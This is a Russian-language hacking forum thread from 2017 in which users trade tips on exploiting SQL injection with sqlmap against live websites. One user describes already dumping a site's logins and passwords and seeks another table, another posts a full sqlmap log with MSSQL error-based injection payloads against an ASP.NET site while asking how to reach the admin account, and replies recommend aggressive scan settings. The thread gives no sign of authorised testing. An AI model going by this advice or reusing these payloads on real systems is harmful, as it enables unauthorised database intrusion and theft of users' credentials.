HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #361  
Старый 22.02.2017, 08:32
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Такая трабла,есть скуля но мап не хочет куртить мотому что не видит ответ от сервера.Как указать строку где нужно смотреть.Знаю что есть команда --string но так и не разобрался как с ней работать
 
Ответить с цитированием

  #362  
Старый 22.02.2017, 13:35
Runx
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме:
679

Репутация: 0
По умолчанию

Добрый день подскажите как исправить данную ситуацию :

При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.

Предлагает использовать --time-sec соглашаюсь.

Если отказаться, вообще не дампит
 
Ответить с цитированием

  #363  
Старый 22.02.2017, 13:50
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от Runx  

Добрый день подскажите как исправить данную ситуацию :
При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.
Предлагает использовать --time-sec соглашаюсь.
Если отказаться, вообще не дампит
Time based SQL-inj по другому некак
 
Ответить с цитированием

  #364  
Старый 22.02.2017, 13:52
Runx
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме:
679

Репутация: 0
По умолчанию

Цитата:
Сообщение от Octavian  

Time based SQL-inj по другому некак
Это и используется
 
Ответить с цитированием

  #365  
Старый 22.02.2017, 13:56
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от Runx  

Это и используется
Как он дампит по одному символу в секунду так и будет дампить
 
Ответить с цитированием

  #366  
Старый 22.02.2017, 13:59
Runx
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме:
679

Репутация: 0
По умолчанию

Цитата:
Сообщение от Octavian  

Как он дампит по одному символу в секунду так и будет дампить
От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
 
Ответить с цитированием

  #367  
Старый 22.02.2017, 16:50
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Runx  

От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
в данном случае стоит протестировать скрипт на --level 5 --risk 3, может быть булеан или юнион там есть.
 
Ответить с цитированием

  #368  
Старый 08.03.2017, 11:13
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

web application technology: ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2008

Пускает только в current-db,в соседние не пускает(.Есть два пользователя Админ и юзер я под юзером.У обоих нет пассов(по крайней мере null).Как подключиться под админом,или есть варинаты попасть в бд?
 
Ответить с цитированием

  #369  
Старый 11.03.2017, 09:34
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Код:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
  Type: error-based
  Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
  Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2libGVoZGQCDA8
WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226
IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48
) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14
  Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys
tem databases' tables
[05:28:16] [INFO] fetching tables for database: sfdsffsdf
[05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER
JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt
ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113)))-- ZTea
[05:28:16] [WARNING] reflective value(s) found and filtering out
[05:28:16] [WARNING] the SQL query provided does not return any output
[05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
'--hex'
[05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118)
+CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI
[05:28:17] [WARNING] the SQL query provided does not return any output
[05:28:17] [CRITICAL] unable to retrieve the tables for any database
Не могу получить таблицы

parse-error

Код:
'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that  configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'
 
Ответить с цитированием

  #370  
Старый 12.03.2017, 17:42
danil911
Новичок
Регистрация: 28.03.2014
Сообщений: 21
Провел на форуме:
7519

Репутация: 0
По умолчанию

Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой :

Код HTML:
Warning:  implode() [function.implode]: Invalid arguments passed in /home/web/site/www/modules/filmnews.php on line 42

Warning:  mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/web/site/www/modules/filmnews.php on line 43

�
запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.